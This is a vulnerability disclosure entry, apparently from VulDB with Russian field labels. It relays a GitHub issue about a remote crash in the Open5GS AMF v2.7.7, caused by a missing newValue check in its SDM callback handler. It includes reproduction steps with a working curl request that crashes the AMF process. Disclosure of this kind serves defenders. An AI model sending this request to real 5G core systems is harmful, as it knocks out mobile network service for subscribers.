| Название | Open5GS AMF v2.7.7 Denial of Service |
|---|
| Описание | ### Open5GS Release, Revision, or Tag
v2.7.7
### Description
AMF crashes when it receives
`POST /namf-callback/v1/{anything}/sdmsubscription-notify`
with a `ModificationNotification` whose `changeItem` omits `newValue`.
The `ChangeItem` parser accepts a missing `newValue`, but
`amf_namf_callback_handle_sdm_data_change_notify()` later calls
`update_ambr()`, which unconditionally dereferences `item_change->new_value->json`.
This makes the callback route remotely crashable with a single HTTP request.
### Steps to reproduce
1. Start the official Open5GS v2.7.7 Docker deployment.
2. Register a real UE so that the callback can reference a valid SUPI. In my
live setup I used the existing MongoDB subscriber:
```text
IMSI: 001011234567891
K: 00000000000000000000000000000000
OPC: 00000000000000000000000000000000
AMF: 8000
DNN: internet
S-NSSAI: SST=1, SD=1
```
3. Bring up a UERANSIM gNB and UE on the same Docker network and wait until the
UE is fully registered. In my live setup the AMF log showed:
```text
[imsi-001011234567891] Registration complete
```
4. Send the following HTTP/2 callback request to the AMF SBI endpoint
(`http://10.33.33.9:80` in my live setup):
```bash
curl --http2-prior-knowledge -m 5 -sS -i \
-X POST http://10.33.33.9/namf-callback/v1/x/sdmsubscription-notify \
-H 'content-type: application/json' \
--data '{"notifyItems":[{"resourceId":"imsi-001011234567891/am-data","changes":[{"op":"REMOVE","path":"/foo"}]}]}'
```
5. Check the AMF container state and logs:
```bash
docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' amf
docker logs --tail 80 amf
```
### Logs
```text
04/10 15:51:47.137: [gmm] INFO: [imsi-001011234567891] Registration complete
/usr/local/bin/entrypoint.sh: line 10: 8 Segmentation fault (core dumped) open5gs-amfd "${@}"
```
### Expected behaviour
AMF should reject the malformed callback with a normal HTTP error such as
`400 Bad Request`, and the AMF process should remain running.
### Observed Behaviour
The HTTP/2 stream terminates abnormally, no proper error response is returned,
and the AMF process exits with code `139` due to a segmentation fault.
### eNodeB/gNodeB
UERANSIM gNB v3.2.7
### UE Models and versions
UERANSIM UE v3.2.7
|
|---|
| Источник | ⚠️ https://github.com/open5gs/open5gs/issues/4395 |
|---|
| Пользователь | ZiyuLin (UID 93568) |
|---|
| Представление | 14.04.2026 04:01 (2 месяцы назад) |
|---|
| Модерация | 30.04.2026 18:26 (17 days later) |
|---|
| Статус | принято |
|---|
| Запись VulDB | 360332 [Open5GS до 2.7.7 AMF SBI Endpoint sdmsubscription-notify amf_namf_callback_handle_sdm_data_change_notify changeItem.newValue отказ в обслуживании] |
|---|
| Баллы | 20 |
|---|